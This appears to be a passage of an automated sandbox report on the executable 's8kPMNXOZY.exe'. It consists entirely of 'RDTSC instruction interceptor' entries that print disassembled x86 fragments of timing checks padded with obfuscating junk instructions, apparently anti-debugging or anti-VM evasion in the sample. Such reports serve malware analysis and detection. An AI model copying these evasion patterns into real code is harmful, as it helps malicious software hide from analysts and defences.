Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE7506 second address: AE75BE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6FA0B89506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c jnp 00007F6FA0B89522h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F6FA0B89508h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, eax 0x00000030 jmp 00007F6FA0B89517h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F6FA0B89508h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 0000001Bh 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 adc di, 9E96h 0x00000056 xchg eax, esi 0x00000057 jmp 00007F6FA0B89514h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F6FA0B8950Bh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE75BE second address: AE75C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE75C2 second address: AE75C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE9473 second address: AE9477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE873E second address: AE8747 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE8747 second address: AE87B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jno 00007F6FA127EBD9h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F6FA127EBD8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+12B4D58Ah] 0x00000036 mov edi, ecx 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov dword ptr [ebp+129C192Ch], eax 0x00000045 mov eax, dword ptr [ebp+129C07F1h] 0x0000004b sub dword ptr [ebp+12B43A79h], esi 0x00000051 push FFFFFFFFh 0x00000053 push ebx 0x00000054 sub bl, FFFFFF8Ch 0x00000057 pop edi 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jns 00007F6FA127EBDCh 0x00000061 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AEA4CB second address: AEA538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 jp 00007F6FA0B89506h 0x0000000f jmp 00007F6FA0B89514h 0x00000014 popad 0x00000015 pop edi 0x00000016 nop 0x00000017 sbb ebx, 6FB506FAh 0x0000001d jmp 00007F6FA0B89511h 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+12B6A5FEh], edi 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+12B43A79h], edx 0x00000032 xchg eax, esi 0x00000033 jmp 00007F6FA0B89514h 0x00000038 push eax 0x00000039 jnc 00007F6FA0B89527h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE9600 second address: AE9604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE9604 second address: AE961D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B89515h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE961D second address: AE9622 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AE9622 second address: AE96D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6FA0B89506h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F6FA0B89508h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a mov bh, 19h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov ebx, dword ptr [ebp+129C2B23h] 0x00000039 clc 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F6FA0B89508h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b sub dword ptr [ebp+129C2C0Eh], edx 0x00000061 mov eax, dword ptr [ebp+129C0609h] 0x00000067 jmp 00007F6FA0B89518h 0x0000006c push FFFFFFFFh 0x0000006e mov edi, edx 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 pushad 0x00000075 popad 0x00000076 jmp 00007F6FA0B89513h 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AEB561 second address: AEB565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AEB565 second address: AEB56F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AEB56F second address: AEB573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AEDB60 second address: AEDB65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF000B second address: AF000F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF000F second address: AF0013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AEEF04 second address: AEEF0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF3E55 second address: AF3E5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF1FDF second address: AF1FE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF3E5E second address: AF3EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 push esi 0x00000008 jmp 00007F6FA0B89513h 0x0000000d pop ebx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F6FA0B89508h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov di, 7299h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+129C25A9h], ecx 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 ja 00007F6FA0B89508h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF2F1F second address: AF2F37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6FA127EBD6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jo 00007F6FA127EBE4h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF4D4F second address: AF4D8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F6FA0B8950Ch 0x00000010 nop 0x00000011 xor bl, 00000048h 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+12B71EA7h], ecx 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+129C1AA5h], esi 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF4D8A second address: AF4D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF2F37 second address: AF2FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6FA0B89506h 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F6FA0B89508h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d sub dword ptr [ebp+129C33A6h], edi 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a jmp 00007F6FA0B8950Eh 0x0000003f mov eax, dword ptr [ebp+129C07E5h] 0x00000045 push 00000000h 0x00000047 push eax 0x00000048 call 00007F6FA0B89508h 0x0000004d pop eax 0x0000004e mov dword ptr [esp+04h], eax 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc eax 0x0000005b push eax 0x0000005c ret 0x0000005d pop eax 0x0000005e ret 0x0000005f mov edi, dword ptr [ebp+129C38E4h] 0x00000065 push FFFFFFFFh 0x00000067 sbb di, 8E51h 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 jp 00007F6FA0B89506h 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF4D8E second address: AF4D98 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6FA127EBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF2FC5 second address: AF2FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF40B8 second address: AF40BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF40BC second address: AF40C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF5EE8 second address: AF5F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6FA127EBE5h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF9803 second address: AF980B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AF980B second address: AF980F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9528E second address: A9529F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F6FA0B89506h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A9529F second address: A952B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBDFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A952B2 second address: A952B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A952B8 second address: A952D6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6FA127EBE8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A952D6 second address: A952DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE5A4 second address: AFE5AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F6FA127EBD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE5AF second address: AFE5C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6FA0B8950Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE5C7 second address: AFE5CC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE770 second address: AFE776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE776 second address: AFE786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F6FA127EBDEh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE786 second address: AFE78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: AFE78A second address: AFE78F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: A8CE33 second address: A8CE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F6FA0B89514h 0x0000000b je 00007F6FA0B8950Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0B35F second address: B0B37A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6FA127EBE7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0B37A second address: B0B39A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jnp 00007F6FA0B89512h 0x00000011 jmp 00007F6FA0B8950Ch 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A4E9 second address: B0A51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6FA127EBD6h 0x0000000a jp 00007F6FA127EBD6h 0x00000010 popad 0x00000011 jno 00007F6FA127EBEEh 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A51C second address: B0A520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A520 second address: B0A52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A52D second address: B0A56A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA0B89514h 0x00000009 jmp 00007F6FA0B89515h 0x0000000e jmp 00007F6FA0B8950Ch 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A6D2 second address: B0A714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA127EBE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F6FA127EBE2h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F6FA127EBE4h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A714 second address: B0A71B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A71B second address: B0A722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A8A1 second address: B0A8B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0A8B1 second address: B0A8C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F6FA127EBDCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0ACCA second address: B0ACD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6FA0B8950Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0ACD8 second address: B0ACDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0AE8E second address: B0AE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6FA0B89506h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0AE9B second address: B0AEA0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0AEA0 second address: B0AEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6FA0B89506h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6FA0B8950Bh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F6FA0B8950Eh 0x0000001c jmp 00007F6FA0B89516h 0x00000021 push edx 0x00000022 pop edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0AEE4 second address: B0AEEE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6FA127EBDEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0B218 second address: B0B21E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0B21E second address: B0B222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0B222 second address: B0B226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0E5DF second address: B0E5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6FA127EBD6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F6FA127EBDBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0E5F7 second address: B0E5FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B0E5FD second address: B0E603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B15674 second address: B1567A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B1567A second address: B15688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6FA127EBDEh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B15688 second address: B15694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6FA0B8950Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B48703 second address: B4870B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4870B second address: B48714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B48714 second address: B4871A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B4871A second address: B48748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6FA0B8950Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6FA0B89516h 0x00000012 jnl 00007F6FA0B89506h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B48748 second address: B4874C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B47AF9 second address: B47AFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B47E3F second address: B47E44 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B48162 second address: B48175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6FA0B8950Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\s8kPMNXOZY.exeRDTSC instruction interceptor: First address: B48410 second address: B48440 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F6FA127EBE8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F6FA127EBDFh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
